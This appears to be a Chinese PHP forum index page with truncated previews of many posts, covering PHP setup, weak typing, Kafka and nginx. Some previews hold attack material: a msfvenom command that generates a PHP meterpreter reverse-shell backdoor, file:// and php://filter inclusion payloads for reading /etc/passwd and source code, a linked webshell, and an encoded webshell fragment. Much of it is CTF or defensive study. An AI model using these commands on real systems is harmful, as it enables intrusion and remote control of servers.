PHP论坛 今日: 0|主題: 591|排名: 89 

本次想要配置webhook钩子，   做钩子大多是走 ssh 协议, coding 里配置部署公钥   之前用 docker 写钩子, 也是 ssh 权限的问题   包工具： 1.composer require cpliakas/git-wrapper 2.composer : deploy   查看当前是哪个用户在运行 PHP 两种办法： 1、PHP 代码   （1） <pre> <?php echo sh ...

近些年微服务架构大行其道，趁着最近有时间，来捣鼓捣鼓微服务是怎么一回事。 微服务架构 微服务的概念由 Martin Fowler 于2014年3月提出： 微服务架构是一种架构模式，它提倡将单一应用程序划分成一组小的服务，服务之间相互协调、互相配合，为用户提供最终价值。每个服务运行在其独立的进程中，服务和服务之间采用轻量级 ...

简介 PHP在使用双等号(==)判断的时候，不会严格检验传入的变量类型,同时在执行过程中可以将变量自由地进行转换类型。由于弱数据类型的特点，在使用双等号和一些函数时，会造成一定的安全隐患 eg: <?php var_dump("admin"==0); //true var_dump("1admin"==1); //true var_dump("admin1"==1); //false var_ ...

一   建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php     注：生成的反弹木马存放在当前用户home目录下； 将生成的木马上传到目标机中，可以远程访问； windows下asp反弹木马： root@kali:~# msfvenom -p windows/meterpreter/rev ...

针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session ...

思考：子列可以从父类进行继承，那如果子类与父类的成员重名了怎么办？ 引入：首先，类中定义的成员是允许出现与其他类同名的，但是这个过程如果出现了继承，那么重名就存在重写的问题。   重写override【掌握】 定义：重写，即子类中定义了与父类重名的成员，子类可以重写父类任意类成员，通常重写是用来重写父类的方 ...

file:// 作用： 用于访问文件（绝对路径、相对路径、网络路径） 示例： http://www.xx.com?file=file:///etc/passswd php:// 作用： 访问输入输出流 1. php://filter 作用： 读取源代码并进行base64编码输出 示例： http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名]（针 ...

php伪协议是ctf中的一个考点，目前比较熟悉的伪协议有php://filter, php://input, data://text/plain, file://，后续补充。 要成功应用伪协议需要php.ini文件的allow_url_fopen      默认开启 　　　　　　　　　　　　　　　　allow_url_include    默认关闭 file://伪协议 此协议可以 ...

发现一个框架漏洞，可以大量getshell，在网上下载的webshell发现有后门，最后在github上有很多web但是又没说明密码    https://github.com/tennc/webshell/blob/master/php/5678.php 就准备开始解析这段代码 1 <?php 2 $info='7P3ZcuPMsiUIv0pb2b/N6r9pwyDqfLK2ukgkAVJQAhSGCBC4IwFaQsQgpkSJFNvq3duXB0CC1J ...

前言  最近的日子简简单单 早上起来健身+散打来一套 看看电视剧学习学习吃吃饭一天就结束了emmmm太快了一天 所以要更加努力！更加勤奋！ PHP代码执行漏洞 有的应用程序中提供了一些可以将字符串作为代码执行的函数，例如PHP中的eval函数，可以将改函数的参数当做PHP代码来执行。如果对这些函数的参数控制不严格，就可 ...

如果想一步到位,则使用下面的流程进行安装: 第一步: 安装cmake yum install epel-release -y yum install cmake3 -y cp /usr/bin/cmake3 /usr/bin/cmake 执行命令cmake -version 查看是否安装成功: #输出 cmake version 3.16.1 CMake suite maintained and supported by Kitware (kitware.com/cmake). 第二步:安装libzip ...

攻防世界-Web_php_include   （考察的是文件包含） 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET[ ...

ipay88支付 近期接了一个国外的项目，客户指定要这种支付，就搞搞呗，其实流程和思路都是差不多的，往下看 他的流程其实非常简单  下面的流程仔细看看，看懂了就会了 　　　　　　　　　　 1 首先我们需要先获取下单所需要的参数（这个需要去ipay88官网去申请）， 　　　　　　　　　　　　就是下面main.php里面的一些 ...

概述 现在爬虫技术算是一个普遍的技术了，各个语言的爬虫百家争鸣，但是根据笔者自己的感觉还是python是主流。爬虫涉及到太多的东西，笔者并不是专业的爬虫工程师，只不过个人兴趣分享一下。由于笔者是php工作，所以就使用php来进行简单爬虫。不过我的方法应该是很通用的，我相信java，C#等肯定有类似的函数，然后做法其实 ...

发现很多网上的源码，都会被插入一段来历不明的代码。   此类代码加密特征为： $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');、eval(($$O0O0000O0(    例如： <?php /* */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34% ...

php没有官方的kafka扩展，所以我们需要找到社区版的插件用。 目前有一个比较火的kafka扩展，这个扩展是用C写的，直接通过pecl安装。地址：https://arnaud.le-blanc.net/php-rdkafka-doc/phpdoc/book.rdkafka.html  安装这个插件有个前提条件，必须先安装 librdkafka git clone https://github.com/edenhill/libr ...

Go 是由 Google 设计的一门静态类型的编译型语言。它有点类似于 C，但是它包含了更多的优点，比如垃圾回收、内存安全、结构类型和并发性。它的并发机制使多核和网络机器能够发挥最大的作用。这是 GoLang 的最佳卖点之一。此外，Go 速度快，表现力强，干净且高效。这也是 Go 如此吸引开发者学习的原因。 PHP 是一种动态类型 ...

　　 1. 安装所需环境 yum -y install libxml2 libxml2-devel openssl openssl-devel curl-devel libjpeg-devel libpng-devel freetype-devel libmcrypt-devel libzip-devel pcre-devel   2. 下载并安装PHP 1. 下载 wget http://cn2.php.net/distributions/php-7.3.3.tar.gz 2. 解压 tar -xzf php-7.3.3.tar.gz 3 ...

我们对unset() 这个函数的作用的了解大概就是它可以销毁一个变量，释放内存，这种理解并没有错，可能就是不够深入，接下来我通过几个例子向大家展示下unset一个变量后真正发生的一些事情。以下的代码是在linux+php7.1环境下运行 $s = str_repeat('1',256); $m = memory_get_usage(); unset($s); $mm = memory_get_usage() ...

nginx出现502有很多原因，但大部分原因可以归结为资源数量不够用,也就是说后端PHP-fpm处理有问题，nginx将正确的客户端请求发给了后端的php-fpm进程，但是因为php-fpm进程的问题导致不能正确解析php代码，最终返回给了客户端502错误。 nginx+php出现502 bad gateway，一般这都不是nginx的问题，而是由于 fastcgi或者php的问 ...